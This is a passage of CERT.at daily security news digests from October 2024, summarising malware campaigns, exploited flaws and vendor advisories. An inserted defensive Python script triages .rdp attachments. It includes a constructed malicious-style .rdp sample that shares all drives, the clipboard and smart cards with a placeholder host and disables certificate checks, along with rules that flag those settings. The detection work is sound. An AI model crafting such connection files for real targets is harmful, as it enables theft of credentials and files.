https://doublepulsar.com/burning-zero-days-fortijump-fortimanager-vulnerabi…
∗∗∗ Threat Spotlight: WarmCookie/BadSpace ∗∗∗
---------------------------------------------
WarmCookie is a malware family that emerged in April 2024 and has been distributed via regularly conducted malspam and malvertising campaigns.
---------------------------------------------
https://blog.talosintelligence.com/warmcookie-analysis/
∗∗∗ Security vulnerability in Samsung Android driver is under attack ∗∗∗
---------------------------------------------
Drivers for Samsung's mobile processors allow attackers to escalate their privileges. Google warns of ongoing attacks exploiting this.
---------------------------------------------
https://heise.de/-9991521
∗∗∗ Public Report: WhatsApp Contacts Security Assessment ∗∗∗
---------------------------------------------
In May 2024, Meta engaged NCC Group’s Cryptography Services practice to perform a cryptography security assessment of selected aspects of the WhatsApp Identity Proof Linked Storage (IPLS) protocol implementation. IPLS underpins the WhatsApp Contacts solution, which aims to store ..
---------------------------------------------
https://www.nccgroup.com/us/research-blog/public-report-whatsapp-contacts-s…
=====================
= Vulnerabilities =
=====================
∗∗∗ SSA-333468: Multiple Vulnerabilities in InterMesh Subscriber Devices ∗∗∗
---------------------------------------------
InterMesh Subscriber devices contain multiple vulnerabilities that could allow an unauthenticated remote attacker to execute arbitrary code with root privileges. CVSS v4.0 Base Score: 10.0, CVE-2024-47901
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-333468.html?ste_sid=23…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (dmitry, libheif, and python-sql), Fedora (suricata and wireshark), SUSE (cargo-c, libeverest, protobuf, and qemu), and Ubuntu (golang-1.22, libheif, unbound, and webkit2gtk).
---------------------------------------------
https://lwn.net/Articles/995293/
∗∗∗ 2024-10-21: Cyber Security Advisory - ABB Relion 611, 615, 620, 630 series, REX610, REX640, SMU615, SSC600, Arctic solution, COM600, SPA ZC-400, SUE3000 Guidelines to Prevent Unauthorized Modifications of Firmware and Configuration ∗∗∗
---------------------------------------------
https://search.abb.com/library/Download.aspx?DocumentID=2NGA001911&Language…
∗∗∗ Authenticated Remote Code Execution in multiple Xerox printers ∗∗∗
---------------------------------------------
https://sec-consult.com/vulnerability-lab/advisory/authenticated-remote-cod…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 21-10-2024 18:00 − Tuesday 22-10-2024 18:00
Handler: Thomas Pribitzer
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ FortiManager: Update apparently closes security hole under attack ∗∗∗
---------------------------------------------
Without publishing any information, Fortinet has released updates for FortiManager. They apparently close security vulnerabilities that are under attack.
---------------------------------------------
https://heise.de/-9990393
∗∗∗ An .rdp file can be dangerous too ∗∗∗
---------------------------------------------
Today a spear-phishing campaign was observed across Europe in which the recipient is asked to open an attached RDP file.
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/10/auch-rdp-file-kann-gefahrlich-sein
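Both this entry and the APT29 item in the 25-10 report (malicious RDP connection files used to steal Windows credentials and data) concern .rdp attachments, so here is an added triage script for such attachments. It is example code written for this digest, not part of the CERT.at post or the BleepingComputer report. The sample file below is constructed, the target host is a reserved .invalid name, and the choice of which .rdp settings to flag is my own: the keys are documented mstsc settings, but neither article lists them.

```python
import codecs

# Constructed sample of an .rdp attachment (not taken from either article).
SAMPLE_RDP = """\
screen mode id:i:2
full address:s:rdp-gateway.example.invalid:3389
username:s:guest
prompt for credentials:i:0
authentication level:i:0
drivestoredirect:s:*
redirectclipboard:i:1
redirectsmartcards:i:1
redirectprinters:i:0
remoteapplicationmode:i:1
remoteapplicationprogram:s:||Explorer
"""


def decode_rdp(data: bytes) -> str:
    """mstsc.exe saves .rdp files as UTF-16 with a byte-order mark; hand-written
    ones are usually ASCII/UTF-8. Choose the decoder from the BOM."""
    if data.startswith(codecs.BOM_UTF16_LE) or data.startswith(codecs.BOM_UTF16_BE):
        return data.decode("utf-16")
    return data.decode("utf-8", errors="replace").lstrip("\ufeff")


def parse_rdp(text: str) -> dict:
    """Parse 'key:type:value' lines. type is s (string), i (integer) or b (binary).
    Keys are case-insensitive; malformed lines are skipped rather than fatal."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        parts = line.split(":", 2)
        if len(parts) != 3:
            continue
        key, typ, value = parts[0].strip().lower(), parts[1].strip().lower(), parts[2]
        if typ == "i":
            try:
                value = int(value)
            except ValueError:
                continue
        settings[key] = value
    return settings


def triage(settings: dict) -> dict:
    """Flag the settings that hand a malicious RDP server access to the victim's
    side. The selection of keys is my assumption, not a list from the post."""
    return {
        "host": settings.get("full address"),
        # '*' shares every local drive, 'C:;D:' the listed ones, '' none
        "drive_redirection": bool(settings.get("drivestoredirect")),
        "clipboard_redirection": settings.get("redirectclipboard") == 1,
        "smartcard_redirection": settings.get("redirectsmartcards") == 1,
        # RemoteApp mode hides the remote desktop; the user sees only one window
        "remoteapp": settings.get("remoteapplicationmode") == 1,
        # 0 = connect even when the server's certificate cannot be verified
        "no_server_auth_check": settings.get("authentication level") == 0,
        "credentials_prefilled": settings.get("prompt for credentials") == 0
        and bool(settings.get("username")),
    }


def risky_flags(report: dict) -> list:
    """Sorted names of the triage flags that fired, for a one-line verdict."""
    return sorted(k for k, v in report.items() if k != "host" and v is True)


if __name__ == "__main__":
    report = triage(parse_rdp(SAMPLE_RDP))
    print(report["host"], risky_flags(report))
```

Run it over a quarantined attachment with `triage(parse_rdp(decode_rdp(open(path, "rb").read())))`; an attachment that shares all drives, the clipboard and the smart card with an unknown host, while suppressing the server-certificate warning, is worth blocking at the gateway before anyone double-clicks it.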
∗∗∗ Security Flaw in Styra's OPA Exposes NTLM Hashes to Remote Attackers ∗∗∗
---------------------------------------------
Details have emerged about a now-patched security flaw in Styra's Open Policy Agent (OPA) that, if successfully exploited, could have led to leakage of New Technology LAN Manager (NTLM) hashes.
---------------------------------------------
https://thehackernews.com/2024/10/security-flaw-in-styras-opa-exposes.html
∗∗∗ Pixel perfect Ghostpulse malware loader hides inside PNG image files ∗∗∗
---------------------------------------------
The Ghostpulse malware strain now retrieves its main payload via a PNG image file's pixels. This development, security experts say, is "one of the most significant changes" made by the crooks behind it since launching in 2023.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/10/22/ghostpulse_m…
∗∗∗ OpenSSL 3.4.0 released ∗∗∗
---------------------------------------------
Version 3.4.0 of the OpenSSL SSL/TLS library has been released. It adds a number of new encryption algorithms, support for "directly fetched composite signature algorithms such as RSA-SHA2-256", and more. See the release notes for details.
---------------------------------------------
https://lwn.net/Articles/995098/
∗∗∗ Akira ransomware continues to evolve ∗∗∗
---------------------------------------------
As the Akira ransomware group continues to evolve its operations, Talos has the latest research on the group's attack chain, targeted verticals, and potential future TTPs.
---------------------------------------------
https://blog.talosintelligence.com/akira-ransomware-continues-to-evolve/
∗∗∗ Threat actor abuses Gophish to deliver new PowerRAT and DCRAT ∗∗∗
---------------------------------------------
Cisco Talos recently discovered a phishing campaign using an open-source phishing toolkit called Gophish by an unknown threat actor. [..] Talos discovered an undocumented PowerShell RAT we’re calling PowerRAT, as one of the payloads and another infamous Remote Access Tool (RAT) DCRAT.
---------------------------------------------
https://blog.talosintelligence.com/gophish-powerrat-dcrat/
∗∗∗ Using gRPC and HTTP/2 for Cryptominer Deployment: An Unconventional Approach ∗∗∗
---------------------------------------------
In this blog entry, we discuss how malicious actors are exploiting Docker remote API servers via gRPC/h2c to deploy the cryptominer SRBMiner to facilitate their mining of XRP on Docker hosts.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/j/using-grpc-http-2-for-crypto…
∗∗∗ Web Application Security for DevOps: Site and Origin Dynamics and Cross-Site Request Forgery ∗∗∗
---------------------------------------------
This is a continuation of the series on web application security where we dive into cookie dynamics.
---------------------------------------------
https://www.bitsight.com/blog/web-application-security-devops-site-and-orig…
=====================
= Vulnerabilities =
=====================
∗∗∗ VMware fixes bad patch for critical vCenter Server RCE flaw ∗∗∗
---------------------------------------------
VMware has released another security update for CVE-2024-38812, a critical VMware vCenter Server remote code execution vulnerability that was not correctly fixed in the first patch from September 2024.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/vmware-fixes-bad-patch-for-c…
∗∗∗ Zyxel security advisory for insufficiently protected credentials vulnerability in firewalls ∗∗∗
---------------------------------------------
The insufficiently protected credentials vulnerability in the CLI command of the USG FLEX H series firewalls could allow an authenticated local attacker to gain privilege escalation by stealing the authentication token of a login administrator. Note that this attack could be successful only if the administrator has not logged out.
---------------------------------------------
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (ffmpeg, ghostscript, libsepol, openjdk-11, openjdk-17, perl, and python-sql), Oracle (389-ds-base, buildah, containernetworking-plugins, edk2, httpd, java-1.8.0-openjdk, java-11-openjdk, java-17-openjdk, java-21-openjdk, kernel, python-setuptools, skopeo, and webkit2gtk3), Red Hat (buildah), Slackware (openssl), SUSE (apache2, firefox, libopenssl-3-devel, podman, and python310-starlette), and Ubuntu (cups-browsed, firefox, libgsf, and linux-gke).
---------------------------------------------
https://lwn.net/Articles/995095/
∗∗∗ Dell Product Security Update Advisory (CVE-2024-45766) ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/83995/
∗∗∗ SolarWinds Product Security Update Advisory (CVE-2024-45711) ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/84002/
∗∗∗ ICONICS and Mitsubishi Electric Products ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-296-01
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Friday 18-10-2024 18:00 − Monday 21-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ New macOS vulnerability, “HM Surf”, could lead to unauthorized data access ∗∗∗
---------------------------------------------
Microsoft Threat Intelligence uncovered a macOS vulnerability that could potentially allow an attacker to bypass the operating system’s Transparency, Consent, and Control (TCC) technology and gain unauthorized access to a user’s protected data. The vulnerability, which we refer to as “HM Surf”, involves removing the TCC protection for the Safari browser directory and modifying a configuration file in the said directory to gain access to the user’s data, including browsed pages, the device’s camera, microphone, and location, without the user’s consent. [..] Apple released a fix for this vulnerability, now identified as CVE-2024-44133, as part of security updates for macOS Sequoia, released on September 16, 2024. At present, only Safari uses the new protections afforded by TCC.
---------------------------------------------
https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerab…
∗∗∗ Hooked by the Call: A Deep Dive into The Tricks Used in Callback Phishing Emails ∗∗∗
---------------------------------------------
Previously, Trustwave SpiderLabs covered a massive fake order spam scheme that impersonated a tech support company and propagated via Google Groups. Since then, we have observed more spam campaigns using this hybrid form of cyberattack with varying tactics, techniques, and procedures (TTP). [..] In this blog, we will showcase the different spam techniques used in these phishing emails.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hooked-by-t…
∗∗∗ Hackers Exploit Roundcube Webmail XSS Vulnerability to Steal Login Credentials ∗∗∗
---------------------------------------------
Unknown threat actors have been observed attempting to exploit a now-patched security flaw in the open-source Roundcube webmail software as part of a phishing attack designed to steal user credentials. [..] The attack chain, per Positive Technologies, is an attempt to exploit CVE-2024-37383 (CVSS score: 6.1), a stored cross-site scripting (XSS) vulnerability via SVG animate attributes that allows for execution of arbitrary JavaScript in the context of the victim's web browser.
---------------------------------------------
https://thehackernews.com/2024/10/hackers-exploit-roundcube-webmail-xss.html
∗∗∗ Severe flaws in E2EE cloud storage platforms used by millions ∗∗∗
---------------------------------------------
Several end-to-end encrypted (E2EE) cloud storage platforms are vulnerable to a set of security issues that could expose user data to malicious actors. [..] The researchers notified Sync, pCloud, Seafile, and Icedrive of their findings on April 23, 2024, and contacted Tresorit on September 27, 2024, to discuss potential improvements in their particular cryptographic designs. [..] BleepingComputer contacted all five cloud service providers for a comment on Hofmann's and Truong's research, and we received the below statements.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/severe-flaws-in-e2ee-cloud-s…
∗∗∗ Open source LLM tool primed to sniff out Python zero-days ∗∗∗
---------------------------------------------
The static analyzer uses Claude AI to identify vulns and suggest exploit code. Researchers with Seattle-based Protect AI plan to release a free, open source tool that can find zero-day vulnerabilities in Python codebases with the help of Anthropic's Claude AI model.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/10/20/python_zero_…
∗∗∗ Hunting for Remote Management Tools: Detecting RMMs ∗∗∗
---------------------------------------------
Given the wide range of different RMM tools available, performing a threat hunt to identify all different available tools used in the organization brings a couple of challenges. In this blog, we’ll dive a little deeper into how we tackled this challenge and share this knowledge so you can use it to keep your organization safe.
---------------------------------------------
https://blog.nviso.eu/2024/10/21/hunting-for-remote-management-tools-detect…
∗∗∗ Cisco confirms attack on DevHub portal and takes it offline ∗∗∗
---------------------------------------------
Cisco has advanced its ongoing investigation into an IT security incident and has now confirmed an attack. Attackers are said to have had access to data not intended for the public.
---------------------------------------------
https://heise.de/-9987412
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (asterisk, chromium, php-horde-mime-viewer, and php-horde-turba), Fedora (apache-commons-io, buildah, chromium, containers-common, libarchive, libdigidocpp, oath-toolkit, podman, rust-hyper-rustls, rust-reqwest, rust-rustls-native-certs, rust-rustls-native-certs0.7, rust-tonic, rust-tonic-build, rust-tonic-types, rust-tower, rust-tower-http, rust-tower-http0.5, rust-tower0.4, thunderbird, and unbound), SUSE (buildah, chromedriver, chromium, element-desktop, element-web, jetty-annotations, nodejs-electron, php7, php74, php8, podman, python3-virtualbox, qemu, thunderbird, and valkey), and Ubuntu (amd64-microcode).
---------------------------------------------
https://lwn.net/Articles/994941/
∗∗∗ Attackers can attack PCs running Bitdefender and Trend Micro antivirus software ∗∗∗
---------------------------------------------
Security vulnerabilities in antivirus software from Bitdefender and Trend Micro put systems at risk. Admins should install the available security updates promptly to prevent attacks. [..] In the support area of the Bitdefender website, the developers state that they have closed a total of five security vulnerabilities (CVE-2023-49567, CVE-2023-49570, CVE-2023-6055, CVE-2023-6056, CVE-2023-6057) rated "high" in this context. For such an attack to succeed, attackers can, for example, use hash collisions (MD5 and SHA1) to create certificates that are waved through as legitimate. The security problems are said to be resolved in the automatically installed Total Security version 27.0.25.11.
---------------------------------------------
https://heise.de/-9987394
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 17-10-2024 18:00 − Friday 18-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Analysis of the Crypt Ghouls group: continuing the investigation into a series of attacks on Russia ∗∗∗
---------------------------------------------
A close look at the utilities, techniques, and infrastructure used by the hacktivist group Crypt Ghouls has revealed links to groups such as Twelve, BlackJack, etc.
---------------------------------------------
https://securelist.com/crypt-ghouls-hacktivists-tools-overlap-analysis/1142…
∗∗∗ Feline Hackers Among Us? (A Deep Dive and Simulation of the Meow Attack) ∗∗∗
---------------------------------------------
Introduction: In the perpetually evolving field of cybersecurity, new threats materialize daily. Attackers are on the prowl for weaknesses in infrastructure and software like a cat eyeing its helpless prey.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/feline-hack…
∗∗∗ U.S. and Allies Warn of Iranian Cyberattacks on Critical Infrastructure in Year-Long Campaign ∗∗∗
---------------------------------------------
Cybersecurity and intelligence agencies from Australia, Canada, and the U.S. have warned about a year-long campaign undertaken by Iranian cyber actors to infiltrate critical infrastructure organizations via brute-force attacks. "Since October 2023, Iranian ..
---------------------------------------------
https://thehackernews.com/2024/10/us-and-allies-warn-of-iranian.html
∗∗∗ Intel hits back at China's accusations it bakes in NSA backdoors ∗∗∗
---------------------------------------------
Chipzilla says it obeys the law wherever it is, which is nice. Intel has responded to Chinese claims that its chips include security backdoors at the direction of America's NSA.
---------------------------------------------
https://www.theregister.com/2024/10/18/intel_china_security_allegations/
∗∗∗ Alleged Bitcoin crook faces 5 years after SEC's X account pwned ∗∗∗
---------------------------------------------
SIM swappers strike again, warping cryptocurrency prices. An Alabama man faces five years in prison for allegedly attempting to manipulate the price of Bitcoin by pwning the US Securities and Exchange Commission's X account earlier this year.
---------------------------------------------
https://www.theregister.com/2024/10/18/sec_bitcoin_arrest/
∗∗∗ Brazil Arrests ‘USDoD,’ Hacker in FBI Infragard Breach ∗∗∗
---------------------------------------------
Brazilian authorities reportedly have arrested a 33-year-old man on suspicion of being "USDoD," a prolific cybercriminal who rose to infamy in 2022 after infiltrating the FBI's InfraGard program and leaking contact information for 80,000 members. More recently, USDoD was behind a breach at the consumer data broker National Public Data that led ..
---------------------------------------------
https://krebsonsecurity.com/2024/10/brazil-arrests-usdod-hacker-in-fbi-infr…
∗∗∗ EIW — ESET Israel Wiper — used in active attacks targeting Israeli orgs ∗∗∗
---------------------------------------------
One of my Mastodon followers sent me an interesting toot today, which led to this forum post ..
---------------------------------------------
https://doublepulsar.com/eiw-eset-israel-wiper-used-in-active-attacks-targe…
∗∗∗ What I’ve learned in my first 7-ish years in cybersecurity ∗∗∗
---------------------------------------------
Plus, a zero-day vulnerability in Qualcomm chips, exposed health care devices, and the latest on the Salt Typhoon threat actor.
---------------------------------------------
https://blog.talosintelligence.com/threat-source-newsletter-oct-17-2024/
∗∗∗ Call stack spoofing explained using APT41 malware ∗∗∗
---------------------------------------------
Summary: Call stack spoofing isn't a new technique, but it has become more popular in the last few years. Call stacks are a telemetry source for EDR software that can be used to determine if a process made suspicious actions (requesting a handle to the lsass process, writing suspicious code to a newly allocated area, ..
---------------------------------------------
https://cybergeeks.tech/call-stack-spoofing-explained-using-apt41-malware/
∗∗∗ Fake North Korean IT Workers Infiltrate Western Firms, Demand Ransom ∗∗∗
---------------------------------------------
North Korean hackers are infiltrating Western companies using fraudulent IT workers to steal sensitive data and extort ransom.
---------------------------------------------
https://hackread.com/fake-north-korean-it-workers-west-firms-demand-ransom/
∗∗∗ U.S. and UK Warn of Russian Cyber Threats: 9 of 12 GreyNoise-Tracked Vulnerabilities in the Advisory Are Being Probed Right Now ∗∗∗
---------------------------------------------
Joint U.S. and UK advisory identifies 24 vulnerabilities exploited by Russian state-sponsored APT 29, with GreyNoise detecting active probing on nine of these critical CVEs. Stay informed with real-time ..
---------------------------------------------
https://www.greynoise.io/blog/u-s-and-uk-warn-of-russian-cyber-threats-9-of…
∗∗∗ Apple Passwords: this is the recipe for generated passwords ∗∗∗
---------------------------------------------
A senior Apple software engineer explains in a blog post the pattern Apple uses to generate passwords.
---------------------------------------------
https://heise.de/-9986503
=====================
= Vulnerabilities =
=====================
∗∗∗ SVD-2024-1013: Third-Party Package Updates in Splunk Add-on for Office 365 - October 2024 ∗∗∗
---------------------------------------------
Splunk remedied common vulnerabilities and exposures (CVEs) in Third Party Packages in Splunk Add-on for Office 365 versions 4.5.2 and higher.
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-1013
∗∗∗ Synology-SA-24:17 Synology Camera ∗∗∗
---------------------------------------------
The vulnerabilities allow remote attackers to execute arbitrary code, remote attackers to bypass security constraints and remote attackers to conduct denial-of-service attacks via a susceptible version of Synology Camera BC500 Firmware, Synology Camera TC500 Firmware and Synology Camera CC400W Firmware.
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_24_17
∗∗∗ ZDI-24-1419: Trend Micro Deep Security Improper Access Control Local Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1419/
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 16-10-2024 18:00 − Thursday 17-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Iranian hackers act as brokers selling critical infrastructure access ∗∗∗
---------------------------------------------
Iranian hackers are breaching critical infrastructure organizations to collect credentials and network data that can be sold on cybercriminal forums to enable cyberattacks from other threat actors.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/iranian-hackers-act-as-broke…
∗∗∗ With default credentials: Kubernetes vulnerability allows root access via SSH ∗∗∗
---------------------------------------------
Affected are images created with the Kubernetes Image Builder. There is a patch, but it does not protect existing images.
---------------------------------------------
https://www.golem.de/news/mit-standard-zugangsdaten-kubernetes-luecke-ermoe…
∗∗∗ The 2024 State of ICS/OT Cybersecurity: Our Past and Our Future ∗∗∗
---------------------------------------------
The 2024 State of ICS/OT report shows our industry’s growth since 2019 and offers insight into how we may improve going into 2029.
---------------------------------------------
https://www.sans.org/blog/the-2024-state-of-ics-ot-cybersecurity-our-past-a…
∗∗∗ Understanding DORA core concepts: focus on "Critical or important functions" ∗∗∗
---------------------------------------------
With the aim of achieving a high level of digital operational resilience, DORA provides a comprehensive framework for the effective ..
---------------------------------------------
https://sec-consult.com/de/blog/detail/dora-core-concepts-critical-or-impor…
∗∗∗ Cisco confirms ongoing investigation after crims brag about selling tons of data ∗∗∗
---------------------------------------------
Networking giant says no evidence of impact on its systems but will tell customers if their info has been stolen. UPDATED: Cisco has confirmed it is investigating claims of stealing — and now selling — data belonging ..
---------------------------------------------
https://www.theregister.com/2024/10/15/cisco_confirm_ongoing_investigation/
∗∗∗ New ThreatLabz Report: Mobile remains a top threat vector with 111% spyware growth while IoT attacks rise 45% ∗∗∗
---------------------------------------------
The role of the CISO continues to expand, driven by the rising number of breaches and cyberattacks like ransomware, as well as SEC requirements for public organizations to disclose material breaches. Among the fastest-moving ..
---------------------------------------------
https://www.zscaler.com/blogs/security-research/new-threatlabz-report-mobil…
∗∗∗ Sudanese Brothers Arrested in ‘AnonSudan’ Takedown ∗∗∗
---------------------------------------------
The U.S. government on Wednesday announced the arrest and charging of two Sudanese brothers accused of running Anonymous Sudan (a.k.a. AnonSudan), a cybercrime business known for launching powerful distributed denial-of-service (DDoS) attacks against a range of targets, including dozens of hospitals, news websites and cloud providers. One of the ..
---------------------------------------------
https://krebsonsecurity.com/2024/10/sudanese-brothers-arrested-in-anonsudan…
∗∗∗ Russian hacker group claims responsibility for attack on the Internet Archive ∗∗∗
---------------------------------------------
A group calling itself "SN_BLACKMETA" claims to have carried out DDoS attacks on the internet library.
---------------------------------------------
https://www.derstandard.at/story/3000000241091/russische-hackergruppe-beken…
∗∗∗ Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism ∗∗∗
---------------------------------------------
Explore how macOS Gatekeeper's security could be compromised by third-party apps not enforcing quarantine attributes effectively.
---------------------------------------------
https://unit42.paloaltonetworks.com/gatekeeper-bypass-macos/
∗∗∗ Ransomware: Threat Level Remains High in Third Quarter ∗∗∗
---------------------------------------------
Recently established RansomHub group overtakes LockBit to become most prolific ransomware operation.
---------------------------------------------
https://symantec-enterprise-blogs.security.com/threat-intelligence/ransomwa…
∗∗∗ Cyber Resilience Act adopted ∗∗∗
---------------------------------------------
The Cyber Resilience Act (CRA) is an EU regulation on the security of hardware and software products with digital elements, which was adopted by the Council of the European Union on 10.10.2024. After publication in the Official Journal of the EU, the ..
---------------------------------------------
https://certitude.consulting/blog/de/cyber-resilience-act-beschlossen/
∗∗∗ Hacker allegedly behind attacks on FBI, Airbus, National Public Data arrested in Brazil ∗∗∗
---------------------------------------------
Police did not name the suspect, but a threat actor known as USDoD has long boasted of being behind the attacks that were highlighted by Brazilian law enforcement following the arrest.
---------------------------------------------
https://therecord.media/hacker-behind-fbi-npd-airbus-attacks-arrested-brazil
∗∗∗ Why Hackers May Be Targeting You ∗∗∗
---------------------------------------------
In today's evolving cyber threat landscape, small and mid-sized businesses can reduce their risk by understanding cybercriminals, addressing misconceptions, and enhancing their cybersecurity and incident ..
---------------------------------------------
https://www.emsisoft.com/en/blog/46073/why-hackers-may-be-targeting-you/
=====================
= Vulnerabilities =
=====================
∗∗∗ Oracle Releases Quarterly Critical Patch Update Advisory for October 2024 ∗∗∗
---------------------------------------------
Oracle released its quarterly Critical Patch Update Advisory for October 2024 to address vulnerabilities in multiple products. A cyber threat actor could exploit some of these vulnerabilities to take ..
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/10/17/oracle-releases-quarterl…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
https://lwn.net/Articles/994630/
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 15-10-2024 18:00 − Wednesday 16-10-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ ASEC and NCSC Release Joint Report on Microsoft Zero-Day Browser Vulnerability (CVE-2024-38178) ∗∗∗
---------------------------------------------
AhnLab SEcurity intelligence Center (ASEC) and the National Cyber Security Center (NCSC) have discovered a new zero-day vulnerability in the Microsoft Internet Explorer (IE) browser and have conducted a detailed analysis on attacks that exploit this vulnerability. This post shares the joint analysis report “Operation Code on Toast by TA-RedAnt” which details the findings of the ASEC and NCSC joint analysis and the responses to the threat.
---------------------------------------------
https://asec.ahnlab.com/en/83877/
∗∗∗ Exfiltration over Telegram Bots: Skidding Infostealer Logs ∗∗∗
---------------------------------------------
Bitsight’s visibility over infostealer malware which exfiltrates over Telegram suggests that the most infected countries are the USA, Turkey, and Russia, followed by India and Germany.
---------------------------------------------
https://www.bitsight.com/blog/exfiltration-over-telegram-bots-skidding-info…
∗∗∗ EDRSilencer red team tool used in attacks to bypass security ∗∗∗
---------------------------------------------
A tool for red-team operations called EDRSilencer has been observed in malicious incidents attempting to identify security tools and mute their alerts to management consoles.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/edrsilencer-red-team-tool-us…
∗∗∗ Several services affected: Microsoft warns customers of data loss in logging ∗∗∗
---------------------------------------------
Due to a software bug, Microsoft has lost some log data that is important to its customers. Several of the company's cloud services are affected.
---------------------------------------------
https://www.golem.de/news/mehrere-dienste-betroffen-microsoft-warnt-kunden-…
∗∗∗ New Linux Variant of FASTCash Malware Targets Payment Switches in ATM Heists ∗∗∗
---------------------------------------------
The malware is "installed on payment switches within compromised networks that handle card transactions for the means of facilitating the unauthorized withdrawal of cash from ATMs," a security researcher who goes by HaxRob said.
---------------------------------------------
https://thehackernews.com/2024/10/new-linux-variant-of-fastcash-malware.html
∗∗∗ Windows 11 24H2: problems with VPN connections, Direct Access … ∗∗∗
---------------------------------------------
Since Microsoft made Windows 11 24H2 generally available, I have come across reports of problems related to VPN connections (CheckPoint VPN, WireGuard, Direct Access). I am summarizing some of these reports in one post, also to get a picture of whether these are isolated cases or whether more people are affected.
---------------------------------------------
https://www.borncity.com/blog/2024/10/15/windows-11-24h2-probleme-mit-vpn-v…
∗∗∗ Windows 11 24H2: Recall cannot be uninstalled … ∗∗∗
---------------------------------------------
Despite assurances to the contrary, it is currently turning out that Microsoft's controversial Recall feature cannot be uninstalled [without collateral damage] under Windows 11 24H2 – the whole thing is apparently still in flux, though.
---------------------------------------------
https://www.borncity.com/blog/2024/10/16/windows-11-24h2-recall-nicht-deins…
∗∗∗ Fake LockBit, Real Damage: Ransomware Samples Abuse AWS S3 to Steal Data ∗∗∗
---------------------------------------------
This article uncovers a Golang ransomware abusing AWS S3 for data theft, and masking as LockBit to further pressure victims. The discovery of hard-coded AWS credentials in these samples led to AWS account suspensions.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/j/fake-lockbit-real-damage-ran…
∗∗∗ Comparing AI Against Traditional Static Analysis Tools to Highlight Buffer Overflows ∗∗∗
---------------------------------------------
The idea of this blog post is to use open-source software tools to analyze unknown binaries for buffer overflows. In particular we are focusing on using Ollama3 to access multiple large language models. Ollama is a platform designed to simplify the deployment and usage of LLMs on local machines. This enables private data to be held locally instead of being sent to a cloud for processing.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/comparing-ai-against-traditional-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Oracle Critical Patch Update Advisory - October 2024 ∗∗∗
---------------------------------------------
A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory.
---------------------------------------------
https://www.oracle.com/security-alerts/cpuoct2024.html
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (buildah, containernetworking-plugins, and skopeo), Fedora (pdns-recursor and valkey), Mageia (unbound), Red Hat (fence-agents, firefox, java-11-openjdk, python-setuptools, python3-setuptools, resource-agents, and thunderbird), SUSE (etcd-for-k8s, libsonivox3, rubygem-puma, and unbound), and Ubuntu (apr, libarchive, linux, linux-aws, linux-aws-hwe, linux-azure-4.15, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm, linux-oracle, nano, and vim).
---------------------------------------------
https://lwn.net/Articles/994436/
∗∗∗ HP DesignJet printers: attackers can grab SMTP server logins ∗∗∗
---------------------------------------------
As stated in a security advisory, the vulnerability (CVE-2024-5749) is rated with a threat level of "high". If attacks succeed, SMTP server credentials can be viewed. HP's developers do not currently explain how such an attack might proceed. Specifically affected are the DesignJet models T730 and T830.
---------------------------------------------
https://heise.de/-9983364
∗∗∗ Mozilla: Security Vulnerabilities fixed in Firefox for iOS 131.2 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2024-54/
∗∗∗ Synology-SA-24:14 Synology Photos ∗∗∗
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_24_14
∗∗∗ Synology-SA-24:13 BeePhotos ∗∗∗
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_24_13
∗∗∗ Bosch: Unrestricted resource consumption in BVMS ∗∗∗
---------------------------------------------
https://psirt.bosch.com/security-advisories/bosch-sa-162032-bt.html
